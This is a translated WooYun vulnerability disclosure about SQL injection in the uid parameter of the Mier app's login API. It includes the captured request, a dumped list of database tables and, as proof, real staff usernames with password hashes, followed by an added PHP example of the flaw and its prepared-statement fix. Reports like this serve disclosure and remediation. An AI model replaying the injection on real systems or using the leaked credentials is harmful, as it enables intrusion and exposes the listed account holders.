Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0123358

Title: SQL injection at one location in the 米尔 (Mier) app

Affected vendor: 米尔网

Reporter: 杀手

Submitted: 2015-07-03 08:07

Fix time: 2015-08-17 08:08

Published: 2015-08-17 08:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-03: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public
2015-08-17: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Injection

Detailed description:

[Screenshot: 2.png]

This is the main site. Download the app and test it. Login interface, capture the request!

POST /api/2.0.3/logreg_json.php?plat=android&proct=mierapp&apiCode=1&versioncode=20150617 HTTP/1.1
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Host: bbs.mier123.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4 Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Encoding: gzip

act=login&uid=yxtest&pwd=yxtest123&versioncode=20150617

The uid parameter is injectable!

[Screenshot: 3.png]

Run it!

[Screenshot: 4.png]


Database: wap_2013
[110 tables]
+---------------------+
| duoshuo_commentmeta |
| m_addonarticle |
| m_addonimages |
| m_addoninfos |
| m_addonshop |
| m_addonsoft |
| m_addonspec |
| m_admin |
| m_admintype |
| m_advancedsearch |
| m_app_action_log |
| m_app_action_mi_log |
| m_app_ad |
| m_app_channel |
| m_app_datalog |
| m_app_down |
| m_app_exchange |
| m_app_help |
| m_app_image |
| m_app_member |
| m_app_member_addons |
| m_app_member_banned |
| m_app_reward |
| m_app_share |
| m_app_tuijian |
| m_app_user_relation |
| m_arcatt |
| m_arccache |
| m_archives |
| m_arcmulti |
| m_arcrank |
| m_arctiny |
| m_arctype |
| m_area |
| m_channeltype |
| m_co_htmls |
| m_co_mediaurls |
| m_co_note |
| m_co_onepage |
| m_co_urls |
| m_diyforms |
| m_dl_log |
| m_downloads |
| m_erradd |
| m_feedback |
| m_feedback_recy |
| m_flink |
| m_flinktype |
| m_freelist |
| m_homepageset |
| m_keywords |
| m_log |
| m_member |
| m_member_company |
| m_member_feed |
| m_member_flink |
| m_member_friends |
| m_member_group |
| m_member_guestbook |
| m_member_model |
| m_member_msg |
| m_member_operation |
| m_member_person |
| m_member_pms |
| m_member_snsmsg |
| m_member_space |
| m_member_stow |
| m_member_stowtype |
| m_member_tj |
| m_member_type |
| m_member_vhistory |
| m_moneycard_record |
| m_moneycard_type |
| m_mtypes |
| m_multiserv_config |
| m_myad |
| m_myadtype |
| m_mytag |
| m_payment |
| m_plus |
| m_purview |
| m_pwd_tmp |
| m_quick_login |
| m_ratings |
| m_scores |
| m_search_cache |
| m_search_keywords |
| m_sgpage |
| m_shops_delivery |
| m_shops_orders |
| m_shops_products |
| m_shops_userinfo |
| m_sign_in |
| m_softconfig |
| m_spec |
| m_speclist |
| m_sphinx |
| m_stepselect |
| m_sys_enum |
| m_sys_module |
| m_sys_set |
| m_sys_task |
| m_sysconfig |
| m_tagindex |
| m_taglist |
| m_uploads |
| m_verifies |
| m_verify_code |
| m_vote |
| m_vote_member |
+---------------------+


Proof of vulnerability:

id    userid           pwd
1     jishubu          4100da4e828673e8cab4
4     app              18c22a3851ec9b6f5747
7     huangchengcheng  61277dab08e4f0205797
8     yangsai          0fd7be54fcadf9da2a4f
9     xuchun           09c8864fff4f328e09bc
10    lixin            dd90a9e2287b2c011edb
11    wangshun         6a60ccd5e11978bae948
281   junshijia        f6852cca0d2f70c789c1
316   penghaoming      0e6f1b3e8a60e80a7867
340   changbaichao     b804c30ef693546ca463

Remediation:
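The report does not describe the server-side code, only that the uid parameter of the login endpoint logreg_json.php is injectable. The following is an added illustration, not the vendor's or the reporter's code, of the defect class this describes and its standard fix: a login handler that splices the POST parameter uid into the SQL text, next to the same handler using a prepared statement with a bound parameter. It runs against an in-memory SQLite database so it can be executed offline with plain PHP; the table name m_app_member and its columns are assumptions loosely modelled on the table list above, and the sample user is constructed.

```php
<?php
// Added example, not the vendor's or the reporter's code. The table name
// m_app_member and its columns are assumptions; the sample user is constructed.

declare(strict_types=1);

function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE m_app_member (id INTEGER PRIMARY KEY, userid TEXT UNIQUE, pwd TEXT)');
    // Store a salted, slow hash rather than a bare digest. The dump in the
    // proof above shows short fixed-length hex strings, which is what makes
    // such a dump directly useful to whoever obtains it.
    $ins = $db->prepare('INSERT INTO m_app_member (userid, pwd) VALUES (:u, :p)');
    $ins->execute([':u' => 'yxtest', ':p' => password_hash('yxtest123', PASSWORD_DEFAULT)]);
    return $db;
}

// VULNERABLE: $uid (taken straight from $_POST['uid'] in a real endpoint)
// becomes part of the SQL text, so quote characters change the query's shape.
function login_vulnerable(PDO $db, string $uid, string $pwd): ?array {
    $sql = "SELECT id, userid, pwd FROM m_app_member WHERE userid = '$uid' LIMIT 1";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pwd, $row['pwd'])) {
        return null;
    }
    return ['id' => (int) $row['id'], 'userid' => $row['userid']];
}

// FIXED: a prepared statement with a bound parameter. The query shape and the
// value travel separately, so uid is only ever compared as data.
function login_fixed(PDO $db, string $uid, string $pwd): ?array {
    $stmt = $db->prepare('SELECT id, userid, pwd FROM m_app_member WHERE userid = :uid LIMIT 1');
    $stmt->execute([':uid' => $uid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Same response for unknown user and wrong password: no user enumeration.
    if ($row === false || !password_verify($pwd, $row['pwd'])) {
        return null;
    }
    return ['id' => (int) $row['id'], 'userid' => $row['userid']];
}

$db = make_db();

// Normal credentials behave the same in both versions.
var_dump(login_fixed($db, 'yxtest', 'yxtest123') !== null);
var_dump(login_fixed($db, 'yxtest', 'wrong') === null);

// Regression check a defender can keep in the test suite: a uid containing a
// single quote must be treated as data. The vulnerable handler raises a SQL
// syntax error, which shows the input reached the SQL parser; the fixed
// handler simply finds no such user.
try {
    login_vulnerable($db, "o'brien", 'x');
    echo "vulnerable: no error (unexpected)\n";
} catch (PDOException $e) {
    echo "vulnerable: input reached the SQL parser: " . $e->getMessage() . "\n";
}
var_dump(login_fixed($db, "o'brien", 'x') === null);
```

The single-quote regression check is deliberately a harmless input: the point of the test is that a login name is never allowed to alter the statement, which is also the property the prepared statement guarantees for every driver that supports real parameter binding. On the storage side, the proof above lists 20-character hex strings for the pwd column, not the output of a salted, iterated scheme such as bcrypt; parameterising the query removes the injection, while switching to password_hash limits what a future dump of the same table would be worth.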

Copyright notice: when reposting, please credit the source: 杀手@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined